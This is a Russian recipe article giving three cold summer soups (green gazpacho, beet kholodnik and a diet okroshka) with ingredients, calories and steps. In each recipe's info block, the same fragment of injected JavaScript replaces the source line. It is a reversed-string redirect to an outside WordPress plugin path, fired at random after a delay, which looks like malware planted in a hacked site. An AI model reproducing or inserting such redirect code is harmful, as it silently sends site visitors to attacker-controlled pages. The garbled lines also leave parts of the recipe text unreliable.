3 рецепта летних холодных супов

Окрошка, гаспачо, холодник со свёклой — главный редактор сайта e-da.net Александра Зайцева рассказывает, как приготовить самые вкусные и полезные холодные супы, которые помогут спастись от летнего зноя.

1. Зелёный гаспачо

3 рецепта летних холодных супов. Изображение номер 1

Фото: Александра Зайцева

3 рецепта летних холодных супов

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

10 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

1 порция

КАЛОРИЙНОСТЬ:

252 ккал

252 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Помидор (большой)

1 шт.

Огурец (маленький)

1 шт.

Репчатый лук

¼ шт.

Брокколи

40 г

Шпинат

1 пучок

Базилик

1 пучок

Чеснок

1 зубчик

Оливковое масло

1 ст. л.

Перец чёрный молотый

2 щепотки

Пармезан

по вкусу

Семечки подсолнуха

по вкусу

  1. Сначала снимите кожицу с помидора. Для этого сделайте крестообразные надрезы сверху и снизу помидора, ошпарьте его крутым кипятком, и кожица легко снимется.
  2. Сложите в блендер все ингредиенты, кроме сыра и семечек, и хорошо взбейте в течение двух минут.
  3. Налейте суп в кружку или тарелку, посыпьте сверху натёртым сыром и семечками и украсьте базиликом.

2. Холодник

3 рецепта летних холодных супов. Изображение номер 2

Фото: Александра Зайцева

3 рецепта летних холодных супов

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

10 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

2 порции

КАЛОРИЙНОСТЬ:

172 ккал

172 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Свёкла

1 шт.

Огурец

1 шт.

Зелёный лук

1 пучок

Укроп

1 пучок

Кефир

2 стакана

Хрен (натёртый)

1 ч. л.

Грецкие орехи

3 шт.

Соль

по вкусу

  1. Огурец и сырую свёклу натрите на крупной тёрке.
  2. Добавьте несколько орехов и хрен по вкусу.
  3. Залейте всё кефиром, посолите, перемешайте и посыпьте рубленой зеленью. Готово!

3. Диетическая окрошка

3 рецепта летних холодных супов. Изображение номер 3

Фото: Александра Зайцева

3 рецепта летних холодных супов

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

50 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

2 порции

КАЛОРИЙНОСТЬ:

316 ккал

316 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Куриная грудка

1 шт.

Перепелиные яйца

10 шт.

Тан

300 мл

Кефир

50 мл

Редис

10 шт.

Огурцы

2 шт.

Кабачок

50 г

Зелень (шпинат, укроп и зелёный лук)

1 пучок

Перец чёрный молотый

по вкусу

Соль

2 ч. л.

  1. Отварите куриную грудку до готовности, остудите и нарежьте на маленькие кусочки.
  2. Всю зелень мелко нарубите, посолите, разомните ложкой или вилкой и оставьте немного настояться.
  3. Огурцы и кабачок нарежьте маленькими кубиками, а редис — тонкими кружочками.
  4. Перепелиные яйца отварите и очистите.
  5. Перемешайте все ингредиенты в кастрюле, добавьте кефир и тан и разливайте по тарелкам.

Ещё больше вкусных и полезных рецептов ищите на сайте e-da.net.

7 ПОЛЕЗНЫХ И ОСВЕЖАЮЩИХ СУПОВ НА КАЖДЫЙ ДЕНЬ

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector